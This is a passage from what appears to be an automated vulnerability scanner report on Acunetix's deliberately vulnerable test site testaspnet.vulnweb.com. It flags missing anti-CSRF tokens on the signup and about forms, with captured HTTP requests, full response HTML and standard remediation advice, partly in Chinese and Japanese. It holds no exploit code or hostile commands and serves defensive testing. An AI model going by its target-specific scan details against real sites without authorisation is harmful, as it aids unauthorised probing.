href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        15. GET http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnSignup" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (315 bytes)
          GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 12954
          
          
          Response body (12954 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx+i81I" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8wYbzXe+sXxDpSfVp4SwbIP85RvA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Signup.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        16. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
